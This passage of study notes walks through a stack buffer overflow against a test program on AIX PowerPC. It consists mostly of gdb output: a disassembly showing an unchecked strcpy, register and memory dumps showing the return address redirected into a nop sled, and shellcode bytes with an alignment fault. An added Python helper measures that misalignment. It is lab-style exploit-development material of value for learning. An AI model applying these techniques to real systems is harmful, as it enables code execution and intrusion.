grep vul
san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul
san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera
-bash-2.05b$ gdb vulnerable 44544
GNU gdb 6.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix5.1.0.0"...
Attaching to program: /home/san/vulnerable, process 44544
0xd01ea254 in read () from /usr/lib/libc.a(shr.o)
(gdb) disas main
Dump of assembler code for function main:
0x10000544 <main+0>: mflr r0
0x10000548 <main+4>: stw r31,-4(r1)
0x1000054c <main+8>: stw r0,8(r1)
0x10000550 <main+12>: stwu r1,-88(r1)
0x10000554 <main+16>: mr r31,r1
0x10000558 <main+20>: stw r3,112(r31)
0x1000055c <main+24>: stw r4,116(r31)
0x10000560 <main+28>: lwz r9,116(r31)
0x10000564 <main+32>: addi r9,r9,4
0x10000568 <main+36>: addi r3,r31,56
0x1000056c <main+40>: lwz r4,0(r9)
0x10000570 <main+44>: bl 0x10007000 <strcpy>
0x10000574 <main+48>: nop
0x10000578 <main+52>: lwz r3,88(r2)
0x1000057c <main+56>: addi r4,r31,56
0x10000580 <main+60>: bl 0x100073ec <printf>
0x10000584 <main+64>: lwz r2,20(r1)
0x10000588 <main+68>: lwz r11,92(r2)
0x1000058c <main+72>: lwz r9,92(r2)
0x10000590 <main+76>: lwz r9,4(r9)
0x10000594 <main+80>: addi r0,r9,-1
0x10000598 <main+84>: stw r0,4(r11)
0x1000059c <main+88>: cmpwi r0,0
0x100005a0 <main+92>: bge- 0x100005b4 <main+112>
0x100005a4 <main+96>: lwz r3,92(r2)
0x100005a8 <main+100>: bl 0x1000747c <__filbuf>
0x100005ac <main+104>: lwz r2,20(r1)
0x100005b0 <main+108>: b 0x100005c8 <main+132>
0x100005b4 <main+112>: lwz r11,92(r2)
0x100005b8 <main+116>: lwz r9,92(r2)
0x100005bc <main+120>: lwz r9,0(r9)
0x100005c0 <main+124>: addi r0,r9,1
0x100005c4 <main+128>: stw r0,0(r11)
0x100005c8 <main+132>: mr r3,r0
0x100005cc <main+136>: lwz r1,0(r1)
0x100005d0 <main+140>: lwz r0,8(r1)
0x100005d4 <main+144>: mtlr r0
0x100005d8 <main+148>: lwz r31,-4(r1)
0x100005dc <main+152>: blr
0x100005e0 <main+156>: .long 0x0
0x100005e4 <main+160>: .long 0x2061
0x100005e8 <main+164>: lwz r0,513(r1)
---Type <return> to continue, or q <return> to quit---
0x100005ec <main+168>: .long 0x0
0x100005f0 <main+172>: .long 0x9c
0x100005f4 <main+176>: .long 0x46d61
0x100005f8 <main+180>: xori r14,r11,7936
End of assembler dump.
(gdb) b *0x100005dc
Breakpoint 1 at 0x100005dc
(gdb) c
Continuing.

Press any key in the window that is running exploit.pl and the gdb debugging window continues:

Breakpoint 1, 0x100005dc in main ()
(gdb) i reg
r0 0x100001cc 268435916
r1 0x2ff22210 804397584
r2 0x20000ee8 536874728
r3 0xf00890f1 -267874063
r4 0xf00890f0 -267874064
r5 0x0 0
r6 0xd032 53298
r7 0x0 0
r8 0x60000000 1610612736
r9 0x60002449 1610622025
r10 0x0 0
r11 0x600026c8 1610622664
r12 0x100005ac 268436908
r13 0xdeadbeef -559038737
r14 0x2 2
r15 0x2ff22264 804397668
r16 0x2ff22270 804397680
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0x20000520 536872224
r29 0x10000000 268435456
r30 0x3 3
r31 0x2ff22b40 804399936
pc 0x100005dc 268436956
ps 0x2d032 184370
cnd 0x24222422 606217250
lr 0x100001cc 268435916
cnt 0x0 0
xer 0x0 0
mq 0x0 0
fpscr 0x0 0
(gdb) x/20x $r1
0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000
0x2ff22220: 0x00000000 0x20000ee8 0x00000002 0x2ff2225c
0x2ff22230: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22240: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22250: 0x00000000 0x00000000 0x00000000 0x2ff22270
(gdb) x/20x 0x2ff22b40
0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b60: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b70: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b80: 0x60606060 0x60606060 0x60606060 0x60606060
...
...
...
(gdb)
0x2ff22f00: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f10: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8
0x2ff22f40: 0x02a63bff 0x0120387f 0xff08389f 0xff10907f

We can see that lr has been overwritten with exactly 0x2ff22b40, which shows that execution can reach 0x2ff22b40, and that address region is filled entirely with nop instructions. Because AIX PowerPC instructions are all fixed at 4 bytes, note that the data at 0x2ff22f34 is misaligned by two bytes, which will certainly prevent the shellcode from executing correctly. watercloud has a very good way of solving this instruction byte-alignment problem.
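As an added example (not part of the original notes or of exploit.pl), a small Python helper that reads `x/20x` lines copied from the gdb session above, follows the saved LR slot at 8(r1), and measures the run of 0x60 bytes it lands in, so the two-byte misalignment at 0x2ff22f34 that the notes point out shows up as a number rather than something spotted by eye. The dump text is a constructed subset of the page's output, and the region the transcript elides with "..." is assumed to be more 0x60 words.

```python
import re

# Constructed sample: a subset of the x/20x lines from the gdb session above.
DUMP = """\
0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000
0x2ff22220: 0x00000000 0x20000ee8 0x00000002 0x2ff2225c
0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8
"""
SP_AT_BLR = 0x2ff22210  # r1 from the `i reg` output at the blr breakpoint
LINE_RE = re.compile(r"\s*0x([0-9a-f]+):((?:\s+0x[0-9a-f]{8})+)", re.I)

def parse_gdb_x(text):
    """Turn `x/Nx` output lines ('ADDR: w0 w1 w2 w3') into {word_addr: word}."""
    mem = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, w in enumerate(m.group(2).split()):
            mem[base + 4 * i] = int(w, 16)
    return mem

def byte_at(mem, addr):
    """AIX on PowerPC is big-endian: byte 0 of a word is its most significant byte."""
    word = mem.get(addr & ~3)
    if word is None:
        return None  # address lies outside the captured dump
    return (word >> (8 * (3 - (addr & 3)))) & 0xFF

def analyze_return(mem, sp, sled_byte=0x60):
    """At the blr breakpoint r1 was already reloaded from 0(r1), so the saved
    LR is at 8(sp). Follow it and measure the run of sled bytes it lands in."""
    target = mem.get(sp + 8)
    if target is None:
        return None
    end = target
    while byte_at(mem, end) == sled_byte:  # a gap (None) also stops the walk
        end += 1
    return {"return_address": target, "sled_bytes": end - target,
            "first_non_sled": end, "misaligned_by": end % 4}

def run_analysis():
    mem = parse_gdb_x(DUMP)
    # Assumption: the region the transcript elides with "..." is more 0x60 words.
    for a in range(0x2ff22b60, 0x2ff22f20, 4):
        mem[a] = 0x60606060
    return analyze_return(mem, SP_AT_BLR)
```

A non-zero `misaligned_by` means the first non-sled byte does not start on a 4-byte boundary, which on a fixed-length instruction set is exactly the defect the notes describe.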
Keywords: AIX PowerPC architecture and its overflow techniques, study notes